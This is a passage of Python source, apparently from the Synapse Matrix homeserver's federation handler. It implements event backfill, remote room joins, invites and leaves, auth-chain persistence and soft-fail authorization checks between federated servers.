t for t in sorted_extremeties_tuple if int(t[1]) <= current_depth
]
# However, we need to check that the filtered extremities are non-empty.
# If they are empty then either we can a) bail or b) still attempt to
# backill. We opt to try backfilling anyway just in case we do get
# relevant events.
if filtered_sorted_extremeties_tuple:
sorted_extremeties_tuple = filtered_sorted_extremeties_tuple
# We don't want to specify too many extremities as it causes the backfill
# request URI to be too long.
extremities = dict(sorted_extremeties_tuple[:5])
# Now we need to decide which hosts to hit first.
# First we try hosts that are already in the room
# TODO: HEURISTIC ALERT.
curr_state = await self.state_handler.get_current_state(room_id)
def get_domains_from_state(state):
"""Get joined domains from state
Args:
state (dict[tuple, FrozenEvent]): State map from type/state
key to event.
Returns:
list[tuple[str, int]]: Returns a list of servers with the
lowest depth of their joins. Sorted by lowest depth first.
"""
joined_users = [
(state_key, int(event.depth))
for (e_type, state_key), event in state.items()
if e_type == EventTypes.Member and event.membership == Membership.JOIN
]
joined_domains = {} # type: Dict[str, int]
for u, d in joined_users:
try:
dom = get_domain_from_id(u)
old_d = joined_domains.get(dom)
if old_d:
joined_domains[dom] = min(d, old_d)
else:
joined_domains[dom] = d
except Exception:
pass
return sorted(joined_domains.items(), key=lambda d: d[1])
curr_domains = get_domains_from_state(curr_state)
likely_domains = [
domain for domain, depth in curr_domains if domain != self.server_name
]
async def try_backfill(domains):
# TODO: Should we try multiple of these at a time?
for dom in domains:
try:
await self.backfill(
dom, room_id, limit=100, extremities=extremities
)
# If this succeeded then we probably already have the
# appropriate stuff.
# TODO: We can probably do something more intelligent here.
return True
except SynapseError as e:
logger.info("Failed to backfill from %s because %s", dom, e)
continue
except HttpResponseException as e:
if 400 <= e.code < 500:
raise e.to_synapse_error()
logger.info("Failed to backfill from %s because %s", dom, e)
continue
except CodeMessageException as e:
if 400 <= e.code < 500:
raise
logger.info("Failed to backfill from %s because %s", dom, e)
continue
except NotRetryingDestination as e:
logger.info(str(e))
continue
except RequestSendFailed as e:
logger.info("Failed to get backfill from %s because %s", dom, e)
continue
except FederationDeniedError as e:
logger.info(e)
continue
except Exception as e:
logger.exception("Failed to backfill from %s because %s", dom, e)
continue
return False
success = await try_backfill(likely_domains)
if success:
return True
# Huh, well *those* domains didn't work out. Lets try some domains
# from the time.
tried_domains = set(likely_domains)
tried_domains.add(self.server_name)
event_ids = list(extremities.keys())
logger.debug("calling resolve_state_groups in _maybe_backfill")
resolve = preserve_fn(self.state_handler.resolve_state_groups_for_events)
states = await make_deferred_yieldable(
defer.gatherResults(
[resolve(room_id, [e]) for e in event_ids], consumeErrors=True
)
)
# dict[str, dict[tuple, str]], a map from event_id to state map of
# event_ids.
states = dict(zip(event_ids, [s.state for s in states]))
state_map = await self.store.get_events(
[e_id for ids in states.values() for e_id in ids.values()],
get_prev_content=False,
)
states = {
key: {
k: state_map[e_id]
for k, e_id in state_dict.items()
if e_id in state_map
}
for key, state_dict in states.items()
}
for e_id, _ in sorted_extremeties_tuple:
likely_domains = get_domains_from_state(states[e_id])
success = await try_backfill(
[dom for dom, _ in likely_domains if dom not in tried_domains]
)
if success:
return True
tried_domains.update(dom for dom, _ in likely_domains)
return False
async def _get_events_and_persist(
self, destination: str, room_id: str, events: Iterable[str]
):
"""Fetch the given events from a server, and persist them as outliers.
This function *does not* recursively get missing auth events of the
newly fetched events. Callers must include in the `events` argument
any missing events from the auth chain.
Logs a warning if we can't find the given event.
"""
room_version = await self.store.get_room_version(room_id)
event_map = {} # type: Dict[str, EventBase]
async def get_event(event_id: str):
with nested_logging_context(event_id):
try:
event = await self.federation_client.get_pdu(
[destination], event_id, room_version, outlier=True,
)
if event is None:
logger.warning(
"Server %s didn't return event %s", destination, event_id,
)
return
event_map[event.event_id] = event
except Exception as e:
logger.warning(
"Error fetching missing state/auth event %s: %s %s",
event_id,
type(e),
e,
)
await concurrently_execute(get_event, events, 5)
# Make a map of auth events for each event. We do this after fetching
# all the events as some of the events' auth events will be in the list
# of requested events.
auth_events = [
aid
for event in event_map.values()
for aid in event.auth_event_ids()
if aid not in event_map
]
persisted_events = await self.store.get_events(
auth_events, allow_rejected=True,
)
event_infos = []
for event in event_map.values():
auth = {}
for auth_event_id in event.auth_event_ids():
ae = persisted_events.get(auth_event_id) or event_map.get(auth_event_id)
if ae:
auth[(ae.type, ae.state_key)] = ae
else:
logger.info("Missing auth event %s", auth_event_id)
event_infos.append(_NewEventInfo(event, None, auth))
await self._handle_new_events(
destination, room_id, event_infos,
)
def _sanity_check_event(self, ev):
"""
Do some early sanity checks of a received event
In particular, checks it doesn't have an excessive number of
prev_events or auth_events, which could cause a huge state resolution
or cascade of event fetches.
Args:
ev (synapse.events.EventBase): event to be checked
Returns: None
Raises:
SynapseError if the event does not pass muster
"""
if len(ev.prev_event_ids()) > 20:
logger.warning(
"Rejecting event %s which has %i prev_events",
ev.event_id,
len(ev.prev_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(ev.auth_event_ids()) > 10:
logger.warning(
"Rejecting event %s which has %i auth_events",
ev.event_id,
len(ev.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def send_invite(self, target_host, event):
""" Sends the invite to the remote server for signing.
Invites must be signed by the invitee's server before distribution.
"""
pdu = await self.federation_client.send_invite(
destination=target_host,
room_id=event.room_id,
event_id=event.event_id,
pdu=event,
)
return pdu
async def on_event_auth(self, event_id: str) -> List[EventBase]:
event = await self.store.get_event(event_id)
auth = await self.store.get_auth_chain(
list(event.auth_event_ids()), include_given=True
)
return list(auth)
async def do_invite_join(
self, target_hosts: Iterable[str], room_id: str, joinee: str, content: JsonDict
) -> Tuple[str, int]:
""" Attempts to join the `joinee` to the room `room_id` via the
servers contained in `target_hosts`.
This first triggers a /make_join/ request that returns a partial
event that we can fill out and sign. This is then sent to the
remote server via /send_join/ which responds with the state at that
event and the auth_chains.
We suspend processing of any received events from this room until we
have finished processing the join.
Args:
target_hosts: List of servers to attempt to join the room with.
room_id: The ID of the room to join.
joinee: The User ID of the joining user.
content: The event content to use for the join event.
"""
# TODO: We should be able to call this on workers, but the upgrading of
# room stuff after join currently doesn't work on workers.
assert self.config.worker.worker_app is None
logger.debug("Joining %s to %s", joinee, room_id)
origin, event, room_version_obj = await self._make_and_verify_event(
target_hosts,
room_id,
joinee,
"join",
content,
params={"ver": KNOWN_ROOM_VERSIONS},
)
# This shouldn't happen, because the RoomMemberHandler has a
# linearizer lock which only allows one operation per user per room
# at a time - so this is just paranoia.
assert room_id not in self.room_queues
self.room_queues[room_id] = []
await self._clean_room_for_join(room_id)
handled_events = set()
try:
# Try the host we successfully got a response to /make_join/
# request first.
host_list = list(target_hosts)
try:
host_list.remove(origin)
host_list.insert(0, origin)
except ValueError:
pass
ret = await self.federation_client.send_join(
host_list, event, room_version_obj
)
origin = ret["origin"]
state = ret["state"]
auth_chain = ret["auth_chain"]
auth_chain.sort(key=lambda e: e.depth)
handled_events.update([s.event_id for s in state])
handled_events.update([a.event_id for a in auth_chain])
handled_events.add(event.event_id)
logger.debug("do_invite_join auth_chain: %s", auth_chain)
logger.debug("do_invite_join state: %s", state)
logger.debug("do_invite_join event: %s", event)
# if this is the first time we've joined this room, it's time to add
# a row to `rooms` with the correct room version. If there's already a
# row there, we should override it, since it may have been populated
# based on an invite request which lied about the room version.
#
# federation_client.send_join has already checked that the room
# version in the received create event is the same as room_version_obj,
# so we can rely on it now.
#
await self.store.upsert_room_on_join(
room_id=room_id, room_version=room_version_obj,
)
max_stream_id = await self._persist_auth_tree(
origin, room_id, auth_chain, state, event, room_version_obj
)
# We wait here until this instance has seen the events come down
# replication (if we're using replication) as the below uses caches.
await self._replication.wait_for_stream_position(
self.config.worker.events_shard_config.get_instance(room_id),
"events",
max_stream_id,
)
# Check whether this room is the result of an upgrade of a room we already know
# about. If so, migrate over user information
predecessor = await self.store.get_room_predecessor(room_id)
if not predecessor or not isinstance(predecessor.get("room_id"), str):
return event.event_id, max_stream_id
old_room_id = predecessor["room_id"]
logger.debug(
"Found predecessor for %s during remote join: %s", room_id, old_room_id
)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.transfer_room_state_on_room_upgrade(
old_room_id, room_id
)
logger.debug("Finished joining %s to %s", joinee, room_id)
return event.event_id, max_stream_id
finally:
room_queue = self.room_queues[room_id]
del self.room_queues[room_id]
# we don't need to wait for the queued events to be processed -
# it's just a best-effort thing at this point. We do want to do
# them roughly in order, though, otherwise we'll end up making
# lots of requests for missing prev_events which we do actually
# have. Hence we fire off the background task, but don't wait for it.
run_in_background(self._handle_queued_pdus, room_queue)
async def _handle_queued_pdus(self, room_queue):
"""Process PDUs which got queued up while we were busy send_joining.
Args:
room_queue (list[FrozenEvent, str]): list of PDUs to be processed
and the servers that sent them
"""
for p, origin in room_queue:
try:
logger.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(origin, p, sent_to_us_directly=True)
except Exception as e:
logger.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, origin, e
)
async def on_make_join_request(
self, origin: str, room_id: str, user_id: str
) -> EventBase:
""" We've received a /make_join/ request, so we create a partial
join event for the room and return that. We do *not* persist or
process it until the other server has signed it and sent it back.
Args:
origin: The (verified) server name of the requesting server.
room_id: Room to create join event in
user_id: The user to create the join for
"""
if get_domain_from_id(user_id) != origin:
logger.info(
"Got /make_join request for user %r from different origin %s, ignoring",
user_id,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
# checking the room version will check that we've actually heard of the room
# (and return a 404 otherwise)
room_version = await self.store.get_room_version_id(room_id)
# now check that we are *still* in the room
is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
if not is_in_room:
logger.info(
"Got /make_join request for room %s we are no longer in", room_id,
)
raise NotFoundError("Not an active room on this server")
event_content = {"membership": Membership.JOIN}
builder = self.event_builder_factory.new(
room_version,
{
"type": EventTypes.Member,
"content": event_content,
"room_id": room_id,
"sender": user_id,
"state_key": user_id,
},
)
try:
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
except SynapseError as e:
logger.warning("Failed to create join to %s because %s", room_id, e)
raise
# The remote hasn't signed it yet, obviously. We'll do the full checks
# when we get the event back in `on_send_join_request`
await self.auth.check_from_context(
room_version, event, context, do_sig_check=False
)
return event
async def on_send_join_request(self, origin, pdu):
""" We have received a join event for a room. Fully process it and
respond with the current state and auth chains.
"""
event = pdu
logger.debug(
"on_send_join_request from %s: Got event: %s, signatures: %s",
origin,
event.event_id,
event.signatures,
)
if get_domain_from_id(event.sender) != origin:
logger.info(
"Got /send_join request for user %r from different origin %s",
event.sender,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
event.internal_metadata.outlier = False
# Send this event on behalf of the origin server.
#
# The reasons we have the destination server rather than the origin
# server send it are slightly mysterious: the origin server should have
# all the necessary state once it gets the response to the send_join,
# so it could send the event itself if it wanted to. It may be that
# doing it this way reduces failure modes, or avoids certain attacks
# where a new server selectively tells a subset of the federation that
# it has joined.
#
# The fact is that, as of the current writing, Synapse doesn't send out
# the join event over federation after joining, and changing it now
# would introduce the danger of backwards-compatibility problems.
event.internal_metadata.send_on_behalf_of = origin
context = await self._handle_new_event(origin, event)
logger.debug(
"on_send_join_request: After _handle_new_event: %s, sigs: %s",
event.event_id,
event.signatures,
)
prev_state_ids = await context.get_prev_state_ids()
state_ids = list(prev_state_ids.values())
auth_chain = await self.store.get_auth_chain(state_ids)
state = await self.store.get_events(list(prev_state_ids.values()))
return {"state": list(state.values()), "auth_chain": auth_chain}
async def on_invite_request(
self, origin: str, event: EventBase, room_version: RoomVersion
):
""" We've got an invite event. Process and persist it. Sign it.
Respond with the now signed event.
"""
if event.state_key is None:
raise SynapseError(400, "The invite event did not have a state key")
is_blocked = await self.store.is_room_blocked(event.room_id)
if is_blocked:
raise SynapseError(403, "This room has been blocked on this server")
if self.hs.config.block_non_admin_invites:
raise SynapseError(403, "This server does not accept room invites")
if not self.spam_checker.user_may_invite(
event.sender, event.state_key, event.room_id
):
raise SynapseError(
403, "This user is not permitted to send invites to this server/user"
)
membership = event.content.get("membership")
if event.type != EventTypes.Member or membership != Membership.INVITE:
raise SynapseError(400, "The event was not an m.room.member invite event")
sender_domain = get_domain_from_id(event.sender)
if sender_domain != origin:
raise SynapseError(
400, "The invite event was not from the server sending it"
)
if not self.is_mine_id(event.state_key):
raise SynapseError(400, "The invite event must be for this server")
# block any attempts to invite the server notices mxid
if event.state_key == self._server_notices_mxid:
raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
# keep a record of the room version, if we don't yet know it.
# (this may get overwritten if we later get a different room version in a
# join dance).
await self._maybe_store_room_on_outlier_membership(
room_id=event.room_id, room_version=room_version
)
event.internal_metadata.outlier = True
event.internal_metadata.out_of_band_membership = True
event.signatures.update(
compute_event_signature(
room_version,
event.get_pdu_json(),
self.hs.hostname,
self.hs.signing_key,
)
)
context = await self.state_handler.compute_event_context(event)
await self.persist_events_and_notify(event.room_id, [(event, context)])
return event
async def do_remotely_reject_invite(
self, target_hosts: Iterable[str], room_id: str, user_id: str, content: JsonDict
) -> Tuple[EventBase, int]:
origin, event, room_version = await self._make_and_verify_event(
target_hosts, room_id, user_id, "leave", content=content
)
# Mark as outlier as we don't have any state for this event; we're not
# even in the room.
event.internal_metadata.outlier = True
event.internal_metadata.out_of_band_membership = True
# Try the host that we successfully called /make_leave/ on first for
# the /send_leave/ request.
host_list = list(target_hosts)
try:
host_list.remove(origin)
host_list.insert(0, origin)
except ValueError:
pass
await self.federation_client.send_leave(host_list, event)
context = await self.state_handler.compute_event_context(event)
stream_id = await self.persist_events_and_notify(
event.room_id, [(event, context)]
)
return event, stream_id
async def _make_and_verify_event(
self,
target_hosts: Iterable[str],
room_id: str,
user_id: str,
membership: str,
content: JsonDict = {},
params: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
origin,
event,
room_version,
) = await self.federation_client.make_membership_event(
target_hosts, room_id, user_id, membership, content, params=params
)
logger.debug("Got response to make_%s: %s", membership, event)
# We should assert some things.
# FIXME: Do this in a nicer way
assert event.type == EventTypes.Member
assert event.user_id == user_id
assert event.state_key == user_id
assert event.room_id == room_id
return origin, event, room_version
async def on_make_leave_request(
self, origin: str, room_id: str, user_id: str
) -> EventBase:
""" We've received a /make_leave/ request, so we create a partial
leave event for the room and return that. We do *not* persist or
process it until the other server has signed it and sent it back.
Args:
origin: The (verified) server name of the requesting server.
room_id: Room to create leave event in
user_id: The user to create the leave for
"""
if get_domain_from_id(user_id) != origin:
logger.info(
"Got /make_leave request for user %r from different origin %s, ignoring",
user_id,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
room_version = await self.store.get_room_version_id(room_id)
builder = self.event_builder_factory.new(
room_version,
{
"type": EventTypes.Member,
"content": {"membership": Membership.LEAVE},
"room_id": room_id,
"sender": user_id,
"state_key": user_id,
},
)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
try:
# The remote hasn't signed it yet, obviously. We'll do the full checks
# when we get the event back in `on_send_leave_request`
await self.auth.check_from_context(
room_version, event, context, do_sig_check=False
)
except AuthError as e:
logger.warning("Failed to create new leave %r because %s", event, e)
raise e
return event
async def on_send_leave_request(self, origin, pdu):
""" We have received a leave event for a room. Fully process it."""
event = pdu
logger.debug(
"on_send_leave_request: Got event: %s, signatures: %s",
event.event_id,
event.signatures,
)
if get_domain_from_id(event.sender) != origin:
logger.info(
"Got /send_leave request for user %r from different origin %s",
event.sender,
origin,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
event.internal_metadata.outlier = False
await self._handle_new_event(origin, event)
logger.debug(
"on_send_leave_request: After _handle_new_event: %s, sigs: %s",
event.event_id,
event.signatures,
)
return None
async def get_state_for_pdu(self, room_id: str, event_id: str) -> List[EventBase]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = {(e.type, e.state_key): e for e in state}
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
prev_event = await self.store.get_event(prev_id)
results[(event.type, event.state_key)] = prev_event
else:
del results[(event.type, event.state_key)]
res = list(results.values())
return res
else:
return []
async def get_state_ids_for_pdu(self, room_id: str, event_id: str) -> List[str]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups_ids(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = state
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
results[(event.type, event.state_key)] = prev_id
else:
results.pop((event.type, event.state_key), None)
return list(results.values())
else:
return []
@log_function
async def on_backfill_request(
self, origin: str, room_id: str, pdu_list: List[str], limit: int
) -> List[EventBase]:
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Synapse asks for 100 events per backfill request. Do not allow more.
limit = min(limit, 100)
events = await self.store.get_backfill_events(room_id, pdu_list, limit)
events = await filter_events_for_server(self.storage, origin, events)
return events
@log_function
async def get_persisted_pdu(
self, origin: str, event_id: str
) -> Optional[EventBase]:
"""Get an event from the database for the given server.
Args:
origin: hostname of server which is requesting the event; we
will check that the server is allowed to see it.
event_id: id of the event being requested
Returns:
None if we know nothing about the event; otherwise the (possibly-redacted) event.
Raises:
AuthError if the server is not currently in the room
"""
event = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
if event:
in_room = await self.auth.check_host_in_room(event.room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
events = await filter_events_for_server(self.storage, origin, [event])
event = events[0]
return event
else:
return None
async def get_min_depth_for_context(self, context):
return await self.store.get_min_depth(context)
async def _handle_new_event(
self, origin, event, state=None, auth_events=None, backfilled=False
):
context = await self._prep_event(
origin, event, state=state, auth_events=auth_events, backfilled=backfilled
)
try:
if (
not event.internal_metadata.is_outlier()
and not backfilled
and not context.rejected
):
await self.action_generator.handle_push_actions_for_event(
event, context
)
await self.persist_events_and_notify(
event.room_id, [(event, context)], backfilled=backfilled
)
except Exception:
run_in_background(
self.store.remove_push_actions_from_staging, event.event_id
)
raise
return context
async def _handle_new_events(
self,
origin: str,
room_id: str,
event_infos: Iterable[_NewEventInfo],
backfilled: bool = False,
) -> None:
"""Creates the appropriate contexts and persists events. The events
should not depend on one another, e.g. this should be used to persist
a bunch of outliers, but not a chunk of individual events that depend
on each other for state calculations.
Notifies about the events where appropriate.
"""
async def prep(ev_info: _NewEventInfo):
event = ev_info.event
with nested_logging_context(suffix=event.event_id):
res = await self._prep_event(
origin,
event,
state=ev_info.state,
auth_events=ev_info.auth_events,
backfilled=backfilled,
)
return res
contexts = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(prep, ev_info) for ev_info in event_infos],
consumeErrors=True,
)
)
await self.persist_events_and_notify(
room_id,
[
(ev_info.event, context)
for ev_info, context in zip(event_infos, contexts)
],
backfilled=backfilled,
)
async def _persist_auth_tree(
self,
origin: str,
room_id: str,
auth_events: List[EventBase],
state: List[EventBase],
event: EventBase,
room_version: RoomVersion,
) -> int:
"""Checks the auth chain is valid (and passes auth checks) for the
state and event. Then persists the auth chain and state atomically.
Persists the event separately. Notifies about the persisted events
where appropriate.
Will attempt to fetch missing auth events.
Args:
origin: Where the events came from
room_id,
auth_events
state
event
room_version: The room version we expect this room to have, and
will raise if it doesn't match the version in the create event.
"""
events_to_context = {}
for e in itertools.chain(auth_events, state):
e.internal_metadata.outlier = True
ctx = await self.state_handler.compute_event_context(e)
events_to_context[e.event_id] = ctx
event_map = {
e.event_id: e for e in itertools.chain(auth_events, state, [event])
}
create_event = None
for e in auth_events:
if (e.type, e.state_key) == (EventTypes.Create, ""):
create_event = e
break
if create_event is None:
# If the state doesn't have a create event then the room is
# invalid, and it would fail auth checks anyway.
raise SynapseError(400, "No create event in state")
room_version_id = create_event.content.get(
"room_version", RoomVersions.V1.identifier
)
if room_version.identifier != room_version_id:
raise SynapseError(400, "Room version mismatch")
missing_auth_events = set()
for e in itertools.chain(auth_events, state, [event]):
for e_id in e.auth_event_ids():
if e_id not in event_map:
missing_auth_events.add(e_id)
for e_id in missing_auth_events:
m_ev = await self.federation_client.get_pdu(
[origin], e_id, room_version=room_version, outlier=True, timeout=10000,
)
if m_ev and m_ev.event_id == e_id:
event_map[e_id] = m_ev
else:
logger.info("Failed to find auth event %r", e_id)
for e in itertools.chain(auth_events, state, [event]):
auth_for_e = {
(event_map[e_id].type, event_map[e_id].state_key): event_map[e_id]
for e_id in e.auth_event_ids()
if e_id in event_map
}
if create_event:
auth_for_e[(EventTypes.Create, "")] = create_event
try:
event_auth.check(room_version, e, auth_events=auth_for_e)
except SynapseError as err:
# we may get SynapseErrors here as well as AuthErrors. For
# instance, there are a couple of (ancient) events in some
# rooms whose senders do not have the correct sigil; these
# cause SynapseErrors in auth.check. We don't want to give up
# the attempt to federate altogether in such cases.
logger.warning("Rejecting %s because %s", e.event_id, err.msg)
if e == event:
raise
events_to_context[e.event_id].rejected = RejectedReason.AUTH_ERROR
await self.persist_events_and_notify(
room_id,
[
(e, events_to_context[e.event_id])
for e in itertools.chain(auth_events, state)
],
)
new_event_context = await self.state_handler.compute_event_context(
event, old_state=state
)
return await self.persist_events_and_notify(
room_id, [(event, new_event_context)]
)
async def _prep_event(
self,
origin: str,
event: EventBase,
state: Optional[Iterable[EventBase]],
auth_events: Optional[MutableStateMap[EventBase]],
backfilled: bool,
) -> EventContext:
context = await self.state_handler.compute_event_context(event, old_state=state)
if not auth_events:
prev_state_ids = await context.get_prev_state_ids()
auth_events_ids = self.auth.compute_auth_events(
event, prev_state_ids, for_verification=True
)
auth_events_x = await self.store.get_events(auth_events_ids)
auth_events = {(e.type, e.state_key): e for e in auth_events_x.values()}
# This is a hack to fix some old rooms where the initial join event
# didn't reference the create event in its auth events.
if event.type == EventTypes.Member and not event.auth_event_ids():
if len(event.prev_event_ids()) == 1 and event.depth < 5:
c = await self.store.get_event(
event.prev_event_ids()[0], allow_none=True
)
if c and c.type == EventTypes.Create:
auth_events[(c.type, c.state_key)] = c
context = await self.do_auth(origin, event, context, auth_events=auth_events)
if not context.rejected:
await self._check_for_soft_fail(event, state, backfilled)
if event.type == EventTypes.GuestAccess and not context.rejected:
await self.maybe_kick_guest_users(event)
return context
async def _check_for_soft_fail(
self, event: EventBase, state: Optional[Iterable[EventBase]], backfilled: bool
) -> None:
"""Checks if we should soft fail the event; if so, marks the event as
such.
Args:
event
state: The state at the event if we don't have all the event's prev events
backfilled: Whether the event is from backfill
"""
# For new (non-backfilled and non-outlier) events we check if the event
# passes auth based on the current state. If it doesn't then we
# "soft-fail" the event.
if backfilled or event.internal_metadata.is_outlier():
return
extrem_ids_list = await self.store.get_latest_event_ids_in_room(event.room_id)
extrem_ids = set(extrem_ids_list)
prev_event_ids = set(event.prev_event_ids())
if extrem_ids == prev_event_ids:
# If they're the same then the current state is the same as the
# state at the event, so no point rechecking auth for soft fail.
return
room_version = await self.store.get_room_version_id(event.room_id)
room_version_obj = KNOWN_ROOM_VERSIONS[room_version]
# Calculate the "current state".
if state is not None:
# If we're explicitly given the state then we won't have all the
# prev events, and so we have a gap in the graph. In this case
# we want to be a little careful as we might have been down for
# a while and have an incorrect view of the current state,
# however we still want to do checks as gaps are easy to
# maliciously manufacture.
#
# So we use a "current state" that is actually a state
# resolution across the current forward extremities and the
# given state at the event. This should correctly handle cases
# like bans, especially with state res v2.
state_sets_d = await self.state_store.get_state_groups(
event.room_id, extrem_ids
)
state_sets = list(state_sets_d.values()) # type: List[Iterable[EventBase]]
state_sets.append(state)
current_states = await self.state_handler.resolve_events(
room_version, state_sets, event
)
current_state_ids = {
k: e.event_id for k, e in current_states.items()
} # type: StateMap[str]
else:
current_state_ids = await self.state_handler.get_current_state_ids(
event.room_id, latest_event_ids=extrem_ids
)
logger.debug(
"Doing soft-fail check for %s: state %s", event.event_id, current_state_ids,
)
# Now check if event pass auth against said current state
auth_types = auth_types_for_event(event)
current_state_ids_list = [
e for k, e in current_state_ids.items() if k in auth_types
]
auth_events_map = await self.store.get_events(current_state_ids_list)
current_auth_events = {
(e.type, e.state_key): e for e in auth_events_map.values()
}
try:
event_auth.check(room_version_obj, event, auth_events=current_auth_events)
except AuthError as e:
logger.warning("Soft-failing %r because %s", event, e)
event.internal_metadata.soft_failed = True
async def on_query_auth(
self, origin, event_id, room_id, remote_auth_chain, rejects, missing
):
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
event = await self.store.get_event(event_id, check_room_id=room_id)
# Just go through and process each event in `remote_auth_chain`. We
# don't want to fall into the trap of `missing` being wrong.
for e in remote_auth_chain:
try:
await self._handle_new_event(origin, e)
except AuthError:
pass
# Now get the current auth_chain for the event.
local_auth_chain = await self.store.get_auth_chain(
list(event.auth_event_ids()), include_given=True
)
# TODO: Check if we would now reject event_id. If so we need to tell
# everyone.
ret = await self.construct_auth_difference(local_auth_chain, remote_auth_chain)
logger.debug("on_query_auth returning: %s", ret)
return ret
async def on_get_missing_events(
self, origin, room_id, earliest_events, latest_events, limit
):
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Only allow up to 20 events to be retrieved per request.
limit = min(limit, 20)
missing_events = await self.store.get_missing_events(
room_id=room_id,
earliest_events=earliest_events,
latest_events=latest_events,
limit=limit,
)
missing_events = await filter_events_for_server(
self.storage, origin, missing_events
)
return missing_events
async def do_auth(
self,
origin: str,
event: EventBase,
context: EventContext,
auth_events: MutableStateMap[EventBase],
) -> EventContext:
"""
Args:
origin:
event:
context:
auth_events:
Map from (event_type, state_key) to event
Normally, our calculated auth_events based on the state of the room
at the event's position in the DAG, though occasionally (eg if the
event is an outlier), may be the auth events claimed by the remote
server.
Also NB that this function adds entries to it.
Returns:
updated context object
"""
room_version = await self.store.get_room_version_id(event.room_id)
room_version_obj = KNOWN_ROOM_VERSIONS[room_version]
try:
context = await self._update_auth_events_and_context_for_auth(
origin, event, context, auth_events
)
except Exception:
# We don't really mind if the above fails, so lets not fail
# processing if it does. However, it really shouldn't fail so
# let's still log as an exception since we'll still want to fix
# any bugs.
logger.exception(
"Failed to double check auth events for %s with remote. "
"Ignoring failure and continuing processing of event.",
event.event_id,
)
try:
event_auth.check(room_version_obj, event, auth_events=auth_events)
except AuthError as e:
logger.warning("Failed auth resolution for %r because %s", event, e)
context.rejected = RejectedReason.AUTH_ERROR
return context
async def _update_auth_events_and_context_for_auth(
self,
origin: str,
event: EventBase,
context: EventContext,
auth_events: MutableStateMap[EventBase],
) -> EventContext:
"""Helper for do_auth. See there for docs.
Checks whether a given event has the expected auth events. If it
doesn't then we talk to the remote server to compare state to see if
we can come to a consensus (e.g. if one server missed some valid
state).
This attempts to resolve any potential divergence of state between
servers, but is not essential and so failures should not block further
processing of the event.
Args:
origin:
event:
context:
auth_events:
Map from (event_type, state_key) to event
Normally, our calculated auth_events based on the state of the room
at the event's position in the DAG, though occasionally (eg if the
event is an outlier), may be the auth events claimed by the remote
server.
Also NB that this function adds entries to it.
Returns:
updated context
"""
event_auth_events = set(event.auth_event_ids())
# missing_auth is the set of the event's auth_events which we don't yet have
# in auth_events.
missing_auth = event_auth_events.difference(
e.event_id for e in auth_events.values()
)
# if we have missing events, we need to fetch those events from somewhere.
#
# we start by checking if they are in the store, and then try calling /event_auth/.
if missing_auth:
have_events = await self.store.have_seen_events(missing_auth)
logger.debug("Events %s are in the store", have_events)
missing_auth.difference_update(have_events)
if missing_auth:
# If we don't have all the auth events, we need to get them.
logger.info("auth_events contains unknown events: %s", missing_auth)
try:
try:
remote_auth_chain = await self.federation_client.get_event_auth(
origin, event.room_id, event.event_id
)
except RequestSendFailed as e1:
# The other side isn't around or doesn't implement the
# endpoint, so lets just bail out.
logger.info("Failed to get event auth from remote: %s", e1)
return context
seen_remotes = await self.store.have_seen_events(
[e.event_id for e in remote_auth_chain]
)
for e in remote_auth_chain:
if e.event_id in seen_remotes:
continue
if e.event_id == event.event_id:
continue
try:
auth_ids = e.auth_event_ids()
auth = {
(e.type, e.state_key): e
for e in remote_auth_chain
if e.event_id in auth_ids or e.type == EventTypes.Create
}
e.internal_metadata.outlier = True
logger.debug(
"do_auth %s missing_auth: %s", event.event_id, e.event_id
)
await self._handle_new_event(origin, e, auth_events=auth)
if e.event_id in event_auth_events:
auth_events[(e.type, e.state_key)] = e
except AuthError:
pass
except Exception:
logger.exception("Failed to get auth chain")
if event.internal_metadata.is_outlier():
# XXX: given that, for an outlier, we'll be working with the
# event's *claimed* auth events rather than those we calculated:
# (a) is there any point in this test, since different_auth below will
# obviously be empty
# (b) alternatively, why don't we do it earlier?
logger.info("Skipping auth_event fetch for outlier")
return context
different_auth = event_auth_events.difference(
e.event_id for e in auth_events.values()
)
if not different_auth:
return context
logger.info(
"auth_events refers to events which are not in our calculated auth "
"chain: %s",
different_auth,
)
# XXX: currently this checks for redactions but I'm not convinced that is
# necessary?
different_events = await self.store.get_events_as_list(different_auth)
for d in different_events:
if d.room_id != event.room_id:
logger.warning(
"Event %s refers to auth_event %s which is in a different room",
event.event_id,
d.event_id,
)
# don't attempt to resolve the claimed auth events against our own
# in this case: just use our own auth events.
#
# XXX: should we reject the event in this case? It feels like we should,
